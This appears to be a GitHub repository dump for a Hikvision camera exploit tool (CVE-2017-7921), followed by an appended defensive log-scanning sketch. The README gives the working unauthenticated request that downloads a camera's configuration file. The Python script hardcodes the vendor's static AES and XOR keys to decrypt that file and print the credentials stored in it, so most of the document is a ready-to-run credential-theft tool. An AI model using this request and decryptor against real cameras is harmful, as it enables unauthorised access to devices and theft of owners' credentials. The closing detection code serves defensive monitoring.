├── configurationFile
├── LICENSE
├── README.md
└── decrypt_configurationFile.py

/configurationFile:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor/HEAD/configurationFile

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 chrisjd20

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# hikvision_CVE-2017-7921_auth_bypass_config_decryptor
This Python script decrypts the configurationFile used by Hikvision cameras vulnerable to CVE-2017-7921.

https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0876.html/

# Description

Hikvision IP Cameras Authentication Bypass (CVE-2017-7921)

Hikvision cameras that are vulnerable to the CVE listed above expose several routes to anyone who supplies a simple base64 string as the `auth` argument in the URL.

For example:

`/System/configurationFile?auth=YWRtaW46MTEK`

This allows an unauthenticated user to download the camera's config file, which includes user information. The configuration file uses weak encryption and a static key by default.

The supplied Python script decrypts this configuration file.

I also supply a sample generated configuration file for you to test with.

# How To Use

`./decrypt_configurationFile.py <configurationFile>`


# Dependencies:

`sudo python3 -m pip install pycryptodome`

**Tested on Ubuntu 20.04 with Python 3.8.5**

--------------------------------------------------------------------------------
/decrypt_configurationFile.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

from itertools import cycle
from Crypto.Cipher import AES
import re
import os
import sys

def add_to_16(s):
    # Zero-pad so the length is a multiple of the AES block size (16 bytes)
    while len(s) % 16 != 0:
        s += b'\0'
    return s

def decrypt(ciphertext, hex_key='279977f62f6cfd2d91cd75b889ce0c9a'):
    # AES-128 in ECB mode with the static default key; the first block is skipped
    key = bytes.fromhex(hex_key)
    ciphertext = add_to_16(ciphertext)
    #iv = ciphertext[:AES.block_size]
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext[AES.block_size:])
    return plaintext.rstrip(b"\0")

def xore(data, key=bytearray([0x73, 0x8B, 0x55, 0x44])):
    # XOR the AES output with the repeating 4-byte key
    return bytes(a ^ b for a, b in zip(data, cycle(key)))

def strings(file):
    # Return printable runs of at least two characters, similar to strings(1)
    chars = r"A-Za-z0-9/\-:.,_$%'()[\]<> "
    shortestReturnChar = 2
    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
    pattern = re.compile(regExp)
    return pattern.findall(file)

def main():
    if len(sys.argv) <= 1 or not os.path.isfile(sys.argv[1]):
        print(f'No valid config file provided to decrypt. For example:\n{sys.argv[0]} <configurationFile>')
        return 1
    # Read the encrypted file, undo the AES layer, then the XOR layer
    with open(sys.argv[1], 'rb') as f:
        xor = xore(decrypt(f.read()))
    result_list = strings(xor.decode('ISO-8859-1'))
    print(result_list)
    return 0

if __name__ == '__main__':
    sys.exit(main())

--------------------------------------------------------------------------------
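The README describes requests that carry a base64 `auth` argument, such as `/System/configurationFile?auth=YWRtaW46MTEK`. The following detection sketch is an added example, not part of this repository: it scans access-log lines for such requests and reports whether the configuration file was requested and served. The combined log format, the proxy in front of the cameras, the sample lines and all function names are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Assumed input: combined-log-format lines from a proxy in front of the cameras.
LOG_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /doc/page/login.asp HTTP/1.1" 200 1200',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 401 0',
    '192.0.2.50 - - [01/Jan/2024:10:02:00 +0000] "GET /index.html?auth=not-base64!! HTTP/1.1" 200 10',
]

def decode_auth(value):
    """Decode an auth= value; return text, or None if it is not valid base64."""
    try:
        # parse_qs turns '+' into ' ', so restore it before strict decoding.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("latin-1").strip()

def find_auth_param_requests(lines):
    """Return one finding per request whose auth= value decodes to user:pass."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        values = parse_qs(url.query).get("auth", [])
        decoded = decode_auth(values[0]) if values else None
        if not decoded or ":" not in decoded:
            continue
        findings.append({
            "src": m["src"],
            "path": url.path,
            "decoded_auth": decoded,
            "config_download": url.path.lower() == "/system/configurationfile",
            "served": m["status"] == "200",  # 200 means the device answered the request
        })
    return findings

if __name__ == "__main__":
    for finding in find_auth_param_requests(SAMPLE_LOG):
        print(finding)
```

A finding with both `config_download` and `served` set means the configuration file left the device, so the credentials stored in it should be treated as exposed.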